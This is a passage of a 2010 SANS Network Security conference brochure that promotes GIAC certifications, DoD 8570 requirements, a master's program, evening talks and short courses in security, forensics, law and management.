“I think the GIAC certification has definitely helped provide credibility for me in the work place. This, in turn, has helped me be more effective at my job.” -MATT AUSTIN, SENIOR SECURITY CONSULTANT, SYMANTEC

4. Proves to hiring managers that you are technically qualified for the job
“Hiring managers are always looking for ways to help sort through candidates. GIAC certifications are a major discriminator. They ensure that the candidate has hands-on technical skills.” -CHRIS SCHOCK, NETWORK ENGINEER, STATE OF COLORADO

Five Ways to Earn a GSE

The GIAC Security Expert (GSE) is the most prestigious certification in information security. There are two parts to the GSE exam, a multiple-choice test and a hands-on lab. The multiple-choice test must be completed before the lab. The GSE hands-on lab will be offered at SANS Network Security 2010. Register by August 1, 2010 to reserve your seat! (Click on the register button on www.giac.org.) To apply for the GSE, you will need to meet one of the following prerequisites:
1) GSEC, GCIH, GCIA – two of which must be Gold
2) GSEC, GCIH, GCIA – one of which must be Gold and one additional elective certification
3) GSEC, GCIH, GCIA – no Gold and two additional elective certifications
4) GCWN, GCUX, GCIH, GCIA – one of which must be Gold
5) GCWN, GCUX, GCIH, GCIA – no Gold and one additional elective certification
* Elective certifications include: GCFA, GCFW, GCUX, GCWN, GCED, GPEN, GSNA, GWAPT, GAWN, and GREM
Learn more about the GSE at www.giac.org/certifications/gse.php or contact us at gse@giac.org

CAREER — SANS COURSE — CERT
Security Analyst — SANS Security Essentials Bootcamp Style — GSEC
Senior Security Analyst — Advanced Security Essentials – Enterprise Defender — GCED
Intrusion Analyst — Intrusion Detection In-Depth — GCIA
Incident Handler — Hacker Techniques, Exploits, and Incident Handling — GCIH
Penetration Tester — Network Penetration Testing and Ethical Hacking — GPEN
Computer Forensics — Computer Forensic Investigations and Incident Response — GCFA
Information Security Manager — SANS Security Leadership Essentials for Managers — GSLC
Information Security Auditor — Auditing Networks, Perimeters, and Systems — GSNA

To see other GIAC certifications, go to www.giac.org.
DEPARTMENT OF DEFENSE

DoD Directive 8570 requires:
By the end of CY 2010, ALL personnel performing IAT and IAM functions must be certified.
By the end of CY 2011, ALL personnel performing CND-SP and IASAE roles must be certified.
ALL IA jobs will be categorized as ‘Technical’ or ‘Management’ Level I, II, or III, and to be qualified for those jobs, you must be certified.

DoD Baseline IA Certifications

TECH I: A+, Network+, SSCP
TECH II: GSEC, Security+, SCNP, SSCP
TECH III: GSE, CISSP*, GCIH, SCNA, CISA

MGT I: GSLC, GISF, Security+, CAP
MGT II: GSLC, CISSP*, CISM, CAP
MGT III: GSLC, CISSP*, CISM

Information Assurance System Architecture and Engineering (IASAE) Certifications
IASAE I: CISSP*
IASAE II: CISSP*
IASAE III: CISSP-ISSEP, CISSP-ISSAP

Computer Network Defense (CND) Certifications
CND Analyst: GCIA, CEH
CND Incident Responder: GCIH, CSIH, CEH
CND Auditor: GSNA, CISA, CEH
CND Infrastructure Support: SSCP, CEH
CND-SP Manager: CISSP-ISSMP, CISM

*Or Associate

SANS Training for GIAC Certifications
COURSE . . . . . . . . . . . . CERT
AUD507 . . . . . . . . . . . . GSNA
MGT414 . . . . . . . . . . . . CISSP
MGT512 . . . . . . . . . . . . GSLC
SEC301 . . . . . . . . . . . . GISF
SEC401 . . . . . . . . . . . . GSEC
SEC503 . . . . . . . . . . . . GCIA
SEC504 . . . . . . . . . . . . GCIH
SEC401 + SEC503 + SEC504 . . . GSE

“It’s not about the cert, it’s about the knowledge gained in pursuit of the cert.” -DAVE HULL, TRUSTED SIGNAL, LLC

Get more information at 8570@sans.org and www.sans.org/8570
Enhance your SANS training! As an added benefit to your training dollar, attend these free talks.

SANS@Night
Check www.sans.org/network-security-2010/night.php for dates and times.

Network Vulnerability Exploitation, Step By Step: From Discovery through to Metasploit Module
Speaker: David Hoelzer
This short one hour evening presentation explains the causes of Heap and Stack Overflows and then presents a step-by-step tutorial demonstrating how to write basic shellcode, how to find an overflow condition, how to determine memory offsets and how to hand-craft an exploit. Attendees need not have deep knowledge of programming or security flaws. Those who have some experience should be able to duplicate the demonstrations, giving you the ability to show others how these types of flaws are exploited.

The Return of Command Line Kung Fu
Speaker: Hal Pomeranz
Hal Pomeranz serves up another tasty serving of his Linux command line madness. Come learn command line skills (and dirty tricks) to help automate common security and audit-related tasks in Linux and Unix. Bring your thorniest problems and try to “stump the expert”.

Cyberwar or Business as Usual? – The State of US Federal CyberSecurity Initiatives
Speaker: James Tarala
Are we near the point of cyber-armageddon or are we simply engaged in a new reality of information security priorities? Are the attacks being discovered daily against private sector and public federal systems somehow unique and new, or are they simply the new reality of cyberspace? Organizations are regularly forced to make difficult decisions about how best to protect their information systems. How do organizations know when security mechanisms are enough to keep their data safe? In an effort to answer this question and respond to mounting cyber incidents worldwide, the US federal government has been engaging in numerous efforts to secure cyberspace. But what are they and will they be enough? In this presentation, James Tarala will describe current efforts and the tools being offered to help citizens and protect cyberspace.

What’s New for Security in Windows 7 and Server 2008-R2?
Speaker: Jason Fossen
The Vista nightmare is finally over, but what’s new for security in Windows 7 and Server 2008-R2 then? The aim of this talk is to give you a bird’s eye view of the Win7 security enhancements to help you decide whether to upgrade or to grit your teeth and stick with XP for another ten years. Topics include BitLocker To Go for flash drives, AppLocker program whitelisting, IPSec DirectAccess, BranchCache, PowerShell 2.0, booting from VHD files, IE8 SmartScreen Filter, hyper-detailed logging, and the hated User Account Control prompt. Bring your questions and get it straight without the anti-Microsoft FUD or the pro-Microsoft propaganda!

Knock, Knock! How Attackers Use Social Engineering to Bypass Your Defenses
Speaker: Lenny Zeltser
Why bother breaking down the door if you can simply ask the person inside to let you in? Social engineering works, both during penetration testing and as part of real-world attacks. This talk explores how attackers are using social engineering to compromise defenses. It presents specific and concrete examples of how social engineering techniques succeeded at bypassing corporate security defenses. Attend this engaging talk to improve the relevance of your security awareness training and to adjust your defenses by revisiting your perspective of the threat landscape.

Opportunity for the Best Security Professionals: Deflect Legal Liability Caused by Growing Security Threats
Speaker: Ben Wright
As IT security threats evolve, multiply and come to have greater impact on society, the potential legal liability connected with a security breach is growing. The need for change is urgent. Mr. Wright shares latest ideas on how greater professionalism among IT security experts can help their employers avoid costly lawsuits and government investigations.

Vendor Expo
Tuesday, September 21, 2010 • 12:00pm - 1:30pm and 5:00pm - 7:00pm
All attendees are invited to meet with established and emerging solution providers as they reveal the latest tools and technologies critical to information security. The SANS Network Security 2010 Vendor Expo showcases product offerings from key technology providers in the commercial tools and services market. Vendors arrive prepared to interact with a technically savvy audience. You’ll find demonstrations and product showcases that feature all the best that the security industry has to offer!

SANS Technology Pavilion
During the expo session, attendees are encouraged to visit the SANS Technology Pavilion, a vendor-sponsored learning forum dedicated to specific information security solutions that are helping organizations successfully address their unique security challenges. See thought leaders and product specialists give brief demonstrations on their solution. See something that piques your interest? Visit the sponsor’s booth for a guided walk-through of these industry leading products.

Vendor Sponsored Lunch Sessions
Tuesday, September 21, 2010 • 12:00pm - 1:30pm
Sign-up at SANS Registration to receive a ticket for a free lunch brought to you by sponsoring vendors. Join these sponsoring vendors and others on the expo floor for an introduction to leading solutions and services that showcase the leading options in information security. Take time to browse the show floor and get introduced to providers and their solutions that align with the security challenges being discussed in class.

Vendor Welcome Reception
Tuesday, September 21, 2010 • 5:00pm - 7:00pm
This informal reception allows you to visit exhibits and participate in some exciting activities. This is a great time to mingle with your peers and experience firsthand the latest in information security tools and solutions with interactive demonstrations. Enjoy appetizers and beverages and compare experiences with other attendees regarding the solutions they are using to address security threats in their organization. Attendees can visit sponsors to receive raffle tickets and enter to win exciting prizes. Prize drawings occur throughout the expo. The more vendors you visit the more chances you have to win!

Vendor-Sponsored Breakfasts, Lunch & Learns, and Cocktail Briefs
Throughout SANS Network Security 2010 vendors will provide sponsored breakfast sessions and lunches where attendees can interact with peers and receive education on vendor solutions. Take a break and get up to date on security technologies! Check the bulletin boards near the SANS Network Security 2010 registration desk for session details and availability. Space is limited; sign up at the registration desk on-site.
The evening cocktail brief events bring good fun and great conversation from hosting vendors. Join the party, have a drink, and take a look at solutions that can help address your organization’s key security issues. The list of Cocktail Briefs will be posted on-site at the registration desk.
Earn Your Master’s Degree in Information Security from the SANS Technology Institute!
www.sans.edu

SANS Technology Institute, an affiliate of the SANS Institute and Global Information Assurance Certification (GIAC), offers one of the few master’s programs in the industry with a specific technical focus on information security. The SANS Technology Institute’s mission is to develop the leaders who will strengthen the security of cyberspace.

If you hold a current GIAC Gold certification with scores of 80 or above in a major course related to the master’s curriculum, then you have already satisfied one of the prerequisites for admission into the master’s program. Applicants who are admitted to a degree program may transfer in GIAC certifications if they are current, related to the curriculum, and have a score of 80 or above.

Prerequisites
• A current GIAC Gold Level certification with exam scores averaging 80 or above from a major certification in the degree program.
• Bachelor’s degree from an accredited college or university with a GPA of 2.8 or higher – unrelated field ok. (Limited exceptions are described at www.sans.edu/admissions)
• One year of experience in information technology/security; three years of significant experience expected upon completion of the program.
• Strong leadership ability (Must be evident in application essays)

How to Apply
• Complete the downloadable application at www.sans.edu/downloads/application.pdf
• Submit the Employer Recommendation of Candidate Form
• Request undergraduate institution to forward an official sealed transcript to the SANS Technology Institute
• Submit a non-refundable Application Fee
• See www.sans.edu/admissions for detailed admission requirements
For admissions questions, please go to www.sans.edu or contact Debbie Svoboda, Dean of Admissions, at info@sans.edu or 720-941-4932.
Tuition assistance is available through limited work-study opportunities.

How to Take Courses
Students have a multitude of course delivery options to meet their degree requirements. Courses may be taken at SANS training events or through the following delivery methods: SANS vLive!, SANS OnDemand, or a limited number of SANS SelfStudy. Not all delivery methods are available for all courses.

Authorization
The SANS Technology Institute (STI) is authorized to grant Master’s degrees by the Maryland Higher Education Commission.
The STI Master’s Program can be Completed in TWO Years
See the recommended degree plans below.
In addition to courses and exams, there are six Community Service Projects required with both degree programs. Learn more about CPRs at www.sans.edu/programs/community.php.
STI operates on a quarterly or rolling system.

The Master of Science Degree in Information Security Engineering – CURRICULUM
Admission Requirement or First Quarter: SEC401 SANS Security Essentials & GIAC GSEC Gold
Second Quarter: SEC504 Hacker Techniques, Exploits & Incident Handling & GIAC GCIH Gold
Third Quarter: MGT525** Project Mgt and Effective Communications for Security Professionals and Managers & GIAC GCPM Gold
Fourth Quarter: SEC503 Intrusion Detection In-Depth & GIAC GCIA Gold
Fifth Quarter: MGT404* Fundamentals of Information Security Policy; MGT421* SANS Leadership and Management Competencies; MGT438* How to Establish a Security Awareness Program
Sixth Quarter: Elective Course
Seventh Quarter: Elective Course
Eighth Quarter: Software Security Training – choice of courses: see www.sans.edu/programs/msise
ELECTIVES: Any SEC/FOR 500/600-Level Courses (FOR508 recommended), AUD507; & GIAC Certs
For a detailed description of this curriculum, please visit www.sans.edu/programs/msise

The Master of Science Degree in Information Security Management – CURRICULUM
Admission Requirement or First Quarter: MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ & GIAC GSLC Gold
Second Quarter: SEC504 Hacker Techniques, Exploits & Incident Handling & GIAC GCIH Gold
Third Quarter: MGT525** Project Mgt and Effective Communications for Security Professionals and Managers & GIAC GCPM Gold
Fourth Quarter: AUD507 Auditing Networks, Perimeters, & Systems & GIAC GSNA Gold
Fifth Quarter: MGT404* Fundamentals of Information Security Policy; MGT421* SANS Leadership and Management Competencies; MGT438* How to Establish a Security Awareness Program
Sixth Quarter: MGT411 SANS 27000 Implementation & Management & GIAC G7799 Gold
Seventh Quarter: LEG523 Legal Issues in Information Technology and Information Security & GIAC GLEG Gold
Eighth Quarter: Software Security Training – choice of courses: see www.sans.edu/programs/msism
For a detailed description of this curriculum, please visit www.sans.edu/programs/msism

*Plus a written assignment
**MGT525 is offered 2-3 times a year
Enhance your Training! The SANS WhatWorks in Legal Issues and PCI Compliance in Information Security Summit is being held in conjunction with SANS NS 2010 in Las Vegas.

Legal Issues and PCI Compliance in Information Security Summit 2010
Las Vegas • September 22-29, 2010

E-Data Retention, Discovery and Destruction: Developing and Implementing IT Policy
All IT departments struggle with the establishment of policy on the retention of electronic records, such as e-mail. These records are commonly demanded in lawsuits, investigations, FOIA requests and other legal inquiries. To address these struggles, SANS will hold a groundbreaking Summit where you will hear from the experts and the users that have addressed these issues in their organizations.

PCI: Meeting Requirements & Minimizing Liability
One of the most interesting discussions at the SANS Security West conference earlier this year had to do with the fact that while standards are good, they often don’t require that we do things correctly. PCI/DSS, for example, requires that sensitive data must be encrypted at rest, but it doesn’t actually require that you do so correctly. What does this mean? What would make it correct and actually limit your organization’s liability?

AUD521: Meeting the Minimum: PCI/DSS 1.2: Becoming and Staying Compliant
Two-Day Course • 9:00am - 5:00pm • Tue, Sept 28 - Wed, Sept 29, 2010
12 CPE Credits • Laptop Required • Instructor: SANS Staff

The payment card industry has been working over the past several years to formalize a standard for security practices that are required for organizations who process or handle payment card transactions. The fruit of this labor is the Payment Card Industry Data Security Standard (currently at version 1.2). This standard, which started life as the Visa Digital Dozen, is a set of focused comprehensive controls for managing the risks surrounding payment card transactions, particularly over the Internet. Of course, compliance validation is one of the requirements. This course was created to allow organizations to exercise due care by performing internal validations through a repeatable, objective process. While the course will cover all of the requirements of the standard, the primary focus is on the technical controls and how they can be measured. Every student will leave the class with a toolkit that can be used to validate any PCI/DSS environment technically and the knowledge of how to use it.

Who Should Attend
• Managers overseeing PCI/DSS compliance
• External auditors performing PCI/DSS validation
• Security professionals operating in a PCI/DSS compliant environment
• Internal auditors desiring to validate interim compliance requirements

Sampling of Topics
• Requirements for compliance
• Compliance guidance for each control
• Suite of tools for validating technical compliance
• Explanation of alternative controls
• Discussion of determining scope for compliance

LEG523: Legal Issues in Information Technology and Information Security
Five-Day Program • Wed, Sept 22 - Sun, Sept 26, 2010 • 9:00am - 5:00pm
30 CPE Credits • Instructor: Ben Wright
GIAC Certification: www.giac.org

New laws regarding privacy, e-discovery, and data security are creating an urgent need for professionals who can bridge the gap between the legal department and the IT department. This necessary professional training is uniquely available in SANS’ LEG523 series of courses, including skills in the analysis and use of contracts, policies, and records management procedures.
GIAC certification under LEG523 demonstrates to employers that a professional has not only attended classes, but studied and absorbed the sophisticated content of these courses. Certification distinguishes any professional, whether an IT expert, an auditor, a paralegal, or a lawyer, and the value of certification will grow in the years to come as law and security issues become even more interlocked.
This course covers the law of business, contracts, fraud, crime, IT security, IT liability, and IT policy – all with a focus on electronically stored and transmitted records.
LEG523 is a five-day package delivering the content of the following one-day courses:
• Fundamentals of IT Security Law and Policy
• E-Records, E-Discovery, and Business Law
• Contracting for Data Security and Other Technology
• The Law of IT Compliance: How to Conduct Investigations
  Lessons will be invaluable to the proper execution of any kind of internal investigation.
• Applying Law to Emerging Dangers: Cyber Defense
  In-depth review of legal response to the major security breach at TJX.

Special Features! This legal offering will cover many recent developments, including TJX, amendments to the Federal Rules of Civil Procedure pertaining to the discovery of electronic records in litigation, and the torment Hewlett-Packard has endured for spying on journalists and members of its board of directors. Hewlett-Packard employed its internal security team and outside investigators in ways that raised legal questions (can you say, “computer crime law”?) and led to criminal indictments. All security professionals should know the lessons from these cases.

Who Should Attend
• Security and IT professionals
• Lawyers
• Paralegals
• Auditors
• Accountants
• Compliance managers
• Vendors of security technologies and services
• Regulatory officials
• Investigators

Senior Instructor: Benjamin Wright
Benjamin Wright is the author of several technology law books, including Business Law and Computer Security, published by the SANS Institute. With 24 years in private law practice, he has advised many organizations, large and small, on privacy, e-commerce, computer security, and e-mail discovery and been quoted in publications around the globe, from the Wall Street Journal to the Sydney Morning Herald. He wrote and presented to the Sri Lankan government a report on technology law, which contributed to the adoption of national e-commerce legislation in 2005. Wright maintains a popular blog at http://legal-beagle.typepad.com.

Register at www.sans.org/pci-legal-info-tech-summit-2010
Real Threats, Real Skills, Real Success
THE SANS CYBER GUARDIAN PROGRAM

About the Program
SANS Cyber Guardian program is designed for the elite teams of technical security professionals who are part of the armed forces, Department of Defense, government agencies, and organizations whose role includes securing systems, reconnaissance, counterterrorism and counter hacks. These teams will be the cyber security special forces where each individual’s role makes the team successful.

Program Overview
• Prerequisite of a GSEC or CISSP
• Core Courses and Certification:
- SEC503: Intrusion Detection In-Depth - GCIA
- FOR508: Computer Forensic Investigations and Incident Response - GCFA
- SEC560: Network Penetration Testing and Ethical Hacking - GPEN
• Select a Red or Blue Specialty
• Complete and Pass Two Specialty Courses and Certifications
• Complete the GSE Hands-On Exam

Join as a Team or an Individual
Both individuals and teams of information security professionals can participate in the SANS Cyber Guardian Program.

For Teams
• Define the size, scope, and mission of your Cyber Guardian Team(s)
• Develop a method to identify talent within your organization
• Select skilled individuals for advanced training for the Cyber Guardian Team
• Determine your method for training
- Live OnSite - At your company location
- Live Conference - At a public SANS conference
- OnDemand - SANS Computer-Based Training (CBT)
- VLive! - Live instruction via the web
• Contact us at onsite@sans.org to create a training schedule

For Individuals
• Choose your specialty – Red or Blue
• Complete the Cyber Guardian application and recommendation forms
• Determine your method for training
- Live Conference – At a public SANS conference
- OnDemand - SANS Computer Based Training (CBT)
- VLive! - Live instruction via the web
• Contact us at onsite@sans.org to create a training schedule

Become a SANS Cyber Guardian and stay one step ahead of the threats as well as know what to do when a breach occurs. Learn more at www.sans.org/cyber-guardian


DEVELOPER SKILL-BASED SHORT COURSE
DEV541: Secure Coding in Java/JEE:
Developing Defensible Applications
Four-Day Course • 9:00am - 5:00pm • Mon, Sept 20 - Thu, Sept 23, 2010 • 24 CPE Credits • Laptop Required • Instructor: Frank Kim

The Difference between Good and Great Programmers
Great programmers have traditionally distinguished themselves by the elegance, effectiveness, and reliability of their code. That’s still true, but elegance, effectiveness, and reliability have now been joined by security. Major financial institutions and government agencies have informed their internal development teams and outsourcers that programmers must demonstrate mastery of secure coding skills and knowledge, through reliable third-party testing, or lose their right to work on assignments for those organizations. More software buyers are joining the movement every week.

The Only Course Covering the Key Elements of Secure Application Development in Java
Such buyer and management demands create an immediate response from programmers, “Where can I learn what is meant by secure coding?” This unique SANS course allows you to bone up on the skills and knowledge being measured in the third-party assessments as defined in the Essential Skills for Secure Programmers Using Java/JavaEE. (You can find the Essential Skills document at http://www.sans-ssi.org/blueprint_files/java_blueprint.pdf.)

What Does the Course Cover?
This is a comprehensive course covering a huge set of skills and knowledge. It’s not a high-level theory course. It’s about real programming. In this course you will examine actual code, work with real tools, build applications, and gain confidence in the resources you need for the journey to improving security of Java applications. Rather than teaching students to use a set of tools, we’re teaching students concepts of secure programming. This involves looking at a specific piece of code, identifying a security flaw, and implementing a fix for that flaw.
This course covers the OWASP Top 10 and the CWE/SANS Top 25 Programming Errors which are important in Java development.

Who Should Attend:
• Developers who want to build more secure applications
• Java EE programmers
• Software engineers
• Software architects
• Application security auditors
• Technical project managers
• Senior software QA specialists
• Penetration testers who want a deeper understanding of target applications or who want to provide more detailed vulnerability remediation options

Prerequisites: Students should have at least one year’s experience working with the JEE framework and should have thorough knowledge of Java language and Web technology.

MANAGEMENT SKILL-BASED SHORT COURSE

MGT305: Technical Communication and Presentation Skills for Security Professionals
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Hoelzer

This course is designed for every IT professional in your organization. In this course we cover the top techniques that
will show any attendee how to research and write professional quality reports, how to create outstanding presentation
materials, and as an added bonus, how to write expert witness reports. Attendees will also get a crash course on advanced
public speaking skills.
Writing reports is a task that many IT professionals struggle with, sometimes from the perspective of writing the report
and other times from the perspective of having to read someone else’s report! In the morning material we cover step by
step how to work through the process of identifying critical ideas, how to properly research them, how to develop a strong
argument in written form, and how to put it all down on paper. We also discuss some of the most common mistakes that
can negatively impact the reception of your work and show how to avoid them. Attendees can expect to see the overall
quality of their reports improve significantly as a result of this material.
Writing the presentation is only half of the battle, though. How do you stand up in front of a group of five or even five
thousand and speak? In the afternoon we will share tips and techniques of top presenters that you can apply to give
the best presentation of your career. Additionally, students will have the opportunity to work up and deliver a short
presentation to the class followed by some personal feedback from one of SANS’ top speakers.

Register at www.sans.org/network-security-2010
MANAGEMENT SKILL-BASED SHORT COURSES
MGT404: Fundamentals of Information Security Policy
One-Day Course • 9:00am - 5:00pm • Sun, Sept 19, 2010 • 6 CPE Credits • Laptop Required • Instructor: Northcutt

Note: There is a lot of material to cover and we do not want to throttle discussion in class, so this course may run past the scheduled time.
This course is designed for IT professionals recently assigned security duties which include responsibility for creating and
maintaining policy and procedures.
The Fundamentals of Information Security Policy course focuses on how to write basic security policies that are issue or
system specific. The student will have a hands-on practical assignment writing a policy template not currently offered as
one of SANS policy templates.
Business needs change, the environment changes, new risks are always on the horizon, and critical systems are continually
exposed to new vulnerabilities. Policy development and assessment is a never ending process. This is a hands-on, exercise
intensive course on writing, implementing and assessing security policies. This course is for anyone who is responsible for
writing security policies and procedures.

MGT421: SANS Leadership and Management Competencies
One-Day Course • 9:00am - 5:00pm • Sat, Sept 25, 2010 • 6 CPE Credits • Laptop Recommended • Instructor: Northcutt

Leadership is a capability that must be learned and developed to better ensure organizational success. The more
techniques we learn, the better our leadership capability becomes. It is brought primarily through selfless devotion to the
organization and staff, tireless effort in setting the example, and the vision to see and effectively use available resources
toward the end goal. Leaders and followers influence each other toward the goal, identified through a two-way street
where all parties perform their function to reach the overall objective.
Our focus is purely leadership-centric; we are not security-centric or technology-centric with this training opportunity. We help an individual develop leadership skills that apply to commercial business, non-profit, not-for-profit, or other organization. This course is designed to develop existing and new supervisors and managers who aspire to go beyond being the boss and build leadership skills to enhance their organizational climate through team-building to enhance the organizational mission through growth in productivity, workplace attitude / satisfaction, and staff and customer relationships.
The manager/supervisor will learn vital, up-to-date knowledge and skills required to shift team paradigms to create a
more positive and cooperative atmosphere in the workplace. Essential leadership topics covered in this management
track include: Leadership Development, Coaching and Training, Employee Involvement, Conflict Resolution, Change
Management, Vision Development, Motivation, Communication Skills, Self-Direction, Brainstorming Techniques, Benefits,
and the ten core Leadership competencies. In a nutshell, this course covers critical processes that should be employed to
develop the skills and techniques to select, train, equip, and develop a team into a single cohesive unit with defined roles
that operate together in harmony toward team-objective accomplishment.

MGT570: Social Engineering Defense


NEW Two-Day Course • 9:00am-5:00pm • Sun, Sept 26-Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Jonathan Ham

Social engineering attacks are on the rise all around the world. The Anti-Phishing Working Group reported that in the first
half of 2009, the number of known, unique phishing sites reached a high of 49,084 per month. Voice social engineering is
used to steal credit card numbers, employee credentials, and more. Companies are routinely targeted by attackers who are
increasingly skilled at manipulating employees to gain access to valuable information and /or facilities.
In this course, security and IT professionals will learn how to design an effective, ethical social engineering testing and
training program. Working in teams, students will take turns developing and practicing e-mail, phone and physical social
engineering techniques customized for their own organizations. Students will analyze case studies, accompanied by video
and audio clips. By the end of the class, each student will have developed a customized social engineering testing and
training program for their organization.

FORENSICS SKILL-BASED SHORT COURSES
FOR526: Advanced Filesystem Recovery and Memory Forensics
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Lee

This advanced course is perfect for the diligent student familiar with core forensic methodology and techniques. If you understand forensic filesystem fundamentals, then this course is for you. It moves quickly from covering memory forensics to recovering and discovering deleted partitions from hard drives. This course focuses on innovative forensic techniques and methodologies so that seasoned practitioners can keep their skills sharp and up-to-date with the latest research areas in both live and static-based disk forensics.

You will receive:
• Forensic analysis workstation VMware machine equipped to investigate forensic data
• Course DVD loaded with case examples, tools, and documentation

Prerequisites
This advanced course is perfect for the diligent student conversant with file system forensic techniques. If you are just beginning in digital forensics, this course is not appropriate for you, as the basics of digital forensics will not be covered.

Topics Covered
• File system structures and metadata
• Partitioning schemes
• Mapping out disk partitions by hand
• Discovering lost partitions from a formatted drive
• Following Microsoft Windows memory process
• The usefulness of collecting memory
• Techniques to collect memory
• Memory analysis techniques
• Windows memory structures

Who Should Attend:
• System administrators and incident handling personnel who are trying to further their knowledge in the latest forensic techniques
• Anyone who wants to learn how file system partitions are structured
• Anyone who wants to learn how to recover lost partitions from a physical disk image
• Anyone who wants to learn how to forensically recover artifacts from memory collected from a machine.

SECURITY SKILL-BASED SHORT COURSES

SEC565: Data Leakage Prevention – In Depth
Four-Day Course • 9:00am - 5:00pm • Mon, Sept 20 - Thu, Sept 23, 2010 • 24 CPE Credits • Laptop Required • Instructor: SANS Staff

The public is growing impatient with data leaks, as we can see from stricter laws, fallout surrounding reputational damage, and lawsuits. This new focus makes information security a ‘bottom-line’ business requirement. When 40% of reported data breaches are caused by human error, we must expand our attention to include the business processes supported by information technology.
Data Leakage Prevention – In Depth provides professionals with time-tested methodologies for detecting data leakage risks and identifying safeguards. When students return to work they will be able to address their organization’s requirements for protecting confidential information, create a data leakage prevention team, conduct an information risk assessment, analyze possible weaknesses in technical systems, and recommend effective approaches for safeguarding systems and processes.
During class we will go in depth into technical subjects to discuss how confidential information gets into the wrong hands. For example, a good security design is pertinent to the storage of critical information in databases, Web applications, e-mail, cloud computing, VPNs, and many other technologies. The course will demystify encryption, text pattern matching, outsourcing, cloud computing, and social networking as they relate to DLP. Moreover, other relevant issues include the fact that outsiders, including the general public and hackers, can also access confidential information through low-tech means, like paper, social engineering, physical access, and portable storage media. The course will teach you about the data leakage risks in all of these areas and more and will demonstrate safeguards with hands-on exercises.
This course provides a comprehensive discussion of DLP requirements and provides techniques for students to determine and evaluate their organization’s DLP risks. The material presents both technical and management subject matter and is designed for technical professionals who are responsible for protecting the confidential information within their organization.
Please Note: While the course provides information about legal obligations for protecting confidential information, it is not offered as legal advice or as a comprehensive educational program around your or your organization’s legal obligations. For more information in these areas, please consider taking one of the SANS legal courses.

SECURITY SKILL-BASED SHORT COURSES
SEC546: IPv6 Essentials
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Ullrich

Your network may not be ready for IPv6, but operating systems and network devices will not hold back. Already, modern
operating systems implement IPv6 by default. Windows 7, for example, ships with Teredo enabled by default. Your
existing firewall may not block it. Learning more about IPv6 is essential to securing your network. This course is designed
not just for implementers of IPv6, but also for those who just need to learn how to detect IPv6 and defend against threats
unintentional IPv6 use may bring.

SEC550: Information Reconnaissance: Competitive Intelligence and Online Privacy
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Galbraith

Information is power! Never before in the history of mankind has so much information been so readily available to so
many people. The trick is knowing where to look and how to look for it. An amazing amount of information is often
only a few skilled keystrokes away from anyone who wants it and knows how to access it. This course guides you on an
exciting and all too often disturbing journey through the World Wide Web (a.k.a Wild Wild Web) in search of actionable
information about people, process, and technology using open-source sources scattered throughout the far reaches of
cyberspace. You will learn about numerous sources, how to leverage Google Hacking effectively, and how to use the tools
of the trade as well as the mindset needed to maximize it all. Bottom line - if they know more than you do, they win...

SEC556: Comprehensive Packet Analysis
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: SANS Staff

Please note that this class overlaps substantially with the SEC503: Intrusion Detection In-Depth course, and the two should not be taken together.
Knowing how to decode network traffic is a skill requirement for any serious network or information security
administrator. Being able to decode the bits and bytes that represent mission-critical networks will give you the skills to
identify malicious activity, troubleshoot network failures, and analyze other desirable or undesirable network events.
This class will give you the skills necessary to decode network traffic with open-source tools available for Unix and
Windows systems. Students will learn advanced pcap packet filtering methods to decode and manipulate network traffic
using tcpdump and use Wireshark to extract files (pictures, documents, executables, etc.) from a data stream for malware
recovery, incident response and forensics analysis. You’ll be able to use these new skills to analyze current or future
network protocols and gain a better understanding of your network traffic. The tools covered in this class are: Windump/
TCPdump, Wireshark, Mergecap, Unix file command, and a Hex Editor.

SEC567: Power Packet Crafting with Scapy
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Novak

Have you ever written a new Snort rule but had no test traffic to see if it alerts? Have you ever tried to craft traffic to
perform some pen testing using a restrictive command line packet crafting tool, but gave up because it couldn’t do what
you wanted it to do? Have you ever wondered if your firewall would block certain traffic? You feel a bit defeated because
you know what you want to do...you just don’t have the proper tool or wherewithal to do it.
The course author exhausted the limitations of command line tools when she was tasked with crafting overlapping TCP
segments – ones with the same TCP sequence numbers, but different payloads in the middle of an established session.
There is no command line tool that allows you to do this with complete control of packet header and payload values.
Attempting this using C or some other programming language seemed daunting. She learned that crafting packets using
scapy is not an arcane skill used only by advanced programmers; it is straightforward and fairly easy using the foundation
delivered in this one-day course.

SECURITY SKILL-BASED SHORT COURSES
SEC564: Hacker Detection for System Administrators
Two-Day Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Baccam

Key Techniques System Administrators Use to Find Hackers In Their Systems (Also known as “Detecting the Wily Hacker”)
This course and continuing updates give system administrators up-to-date tools and techniques to illuminate evidence of
potentially malicious activity on their systems and to look deeper to determine whether problems are real. It uses hands-
on exercises to ensure sysadmins are comfortable using the tools. Because attack vectors are constantly changing, the
program does not stop with the first class, but continues with quarterly updates that illuminate the newest attacks and
how the lessons they learned before would be adjusted to target the newest attacks. Because attackers are increasingly
focusing on database and application software, the program will also include a growing library of up-to-date modules on
finding hackers in specific software applications and Web sites. The order of development of the additional modules will
be determined by a vote of the system administrators who are active in the program.
This course is not designed to make a sysadmin into a security geek. Rather, it will help sysadmins better understand how
they can do what is required by security teams and auditors without wasting a lot of time. The course also has a strong
focus on tools and techniques that system administrators need to meet audit and security requirements as efficiently as
possible. In other words, this class provides the tools and techniques that help sysadmin teams meet the needs of security
and audit teams – and still do their day jobs.

SEC577: Virtualization Security Fundamentals
Two-Day Course • 9:00am - 5:00pm • Sun, Sept 26 - Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Shackleford

